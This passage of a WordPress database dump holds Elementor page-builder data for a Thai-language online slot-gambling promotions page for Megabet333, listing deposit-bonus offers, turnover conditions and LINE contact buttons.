0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d6f8124\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4ce4610\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"9e70ab2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e27\\u0e34\\u0e18\\u0e35\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e921159\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2531\\\" data-end=\\\"2570\\\">\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a \\u2192 \\u0e44\\u0e1b\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e19\\u0e39 <strong data-start=\\\"2555\\\" data-end=\\\"2568\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19<\\/strong><\\/li><li data-start=\\\"2574\\\" data-end=\\\"2643\\\">\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e14 <strong data-start=\\\"2599\\\" data-end=\\\"2614\\\">\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c<\\/strong> (\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e08\\u0e49\\u0e07\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e15\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38)<\\/li><li data-start=\\\"2647\\\" data-end=\\\"2706\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e02\\u0e49\\u0e32 <strong data-start=\\\"2662\\\" data-end=\\\"2675\\\">\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34<\\/strong> \\/ \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e33\\u0e40\\u0e23\\u0e47\\u0e08<\\/li><li data-start=\\\"2710\\\" data-end=\\\"2741\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e2a\\u0e16\\u0e32\\u0e19\\u0e30\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e27\\u0e31\\u0e15\\u0e34\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3257b34\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"076795c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"87a05f6\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9781422\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2092\\\" data-end=\\\"2176\\\">\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a <strong data-start=\\\"2109\\\" data-end=\\\"2138\\\">1 \\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49\\/1 \\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\/1 \\u0e44\\u0e2d\\u0e1e\\u0e35<\\/strong> \\u0e2b\\u0e49\\u0e32\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e17\\u0e38\\u0e01\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a<\\/li><li data-start=\\\"2179\\\" data-end=\\\"2301\\\">\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"2201\\\" data-end=\\\"2237\\\">\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e02\\u0e2d\\u0e07 naijan<\\/strong> \\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 (\\u0e2b\\u0e32\\u0e01\\u0e21\\u0e35\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e41\\u0e08\\u0e49\\u0e07\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21)<\\/li><li data-start=\\\"2304\\\" data-end=\\\"2404\\\">\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e43\\u0e14\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07 \\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e46 \\u0e41\\u0e25\\u0e30 <strong data-start=\\\"2365\\\" data-end=\\\"2385\\\">\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e1b\\u0e23<\\/strong> \\u0e22\\u0e01\\u0e40\\u0e27\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38\\u0e44\\u0e27\\u0e49<\\/li><li data-start=\\\"2407\\\" data-end=\\\"2499\\\">naijan <strong data-start=\\\"2414\\\" data-end=\\\"2445\\\">\\u0e02\\u0e2d\\u0e2a\\u0e07\\u0e27\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\/\\u0e22\\u0e01\\u0e40\\u0e25\\u0e34\\u0e01<\\/strong> \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e1b\\u0e0f\\u0e34\\u0e40\\u0e2a\\u0e18\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e2b\\u0e32\\u0e01\\u0e15\\u0e23\\u0e27\\u0e08\\u0e1e\\u0e1a\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\/\\u0e1c\\u0e34\\u0e14\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1347,165,'_thumbnail_id','53'),(1350,166,'_elementor_edit_mode','builder'),(1351,166,'_elementor_template_type','wp-page'),(1352,166,'_elementor_version','3.32.5'),(1353,166,'_elementor_pro_version','3.32.3'),(1354,166,'_wp_page_template','default'),(1355,166,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1356,166,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 Megabet333 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"346\\\" data-end=\\\"760\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c megabet \\u0e21\\u0e32\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e47\\u0e04\\u0e07\\u0e2b\\u0e19\\u0e35\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e49\\u0e19 \\u201c<strong>\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong>\\u201d \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e1b\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e01\\u0e31\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e36\\u0e07\\u0e41\\u0e02\\u0e48\\u0e07\\u0e02\\u0e31\\u0e19\\u0e01\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e14\\u0e47\\u0e14 \\u0e46 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e2d\\u0e32\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e16\\u0e49\\u0e32\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e04\\u0e22 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e43\\u0e19\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 \\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e16\\u0e2d\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e16\\u0e37\\u0e2d\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36a351d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"77587d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3b12e8f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/20_get_100_-_Megabet333-Biz.webp\",\"id\":161,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f1ccc77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 100\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"01efd62\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 20 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 80 = \\u0e23\\u0e27\\u0e21 100 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 200<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a08 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li>\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f359e1\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"e591d78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3e9ff8e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_get_200_7turn_-_Megabet333-Biz.webp\",\"id\":157,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d853dea\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ea7fc2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 79 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 121 = \\u0e23\\u0e27\\u0e21 200 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 600<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a07 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"883800f\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49fe62a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4dc04\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"b25769f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Free_bonus_100_-_Megabet333-Biz.webp\",\"id\":158,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4e0d99f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e21\\u0e1a\\u0e31\\u0e2a 100%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"20cbe32\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"696\\\" 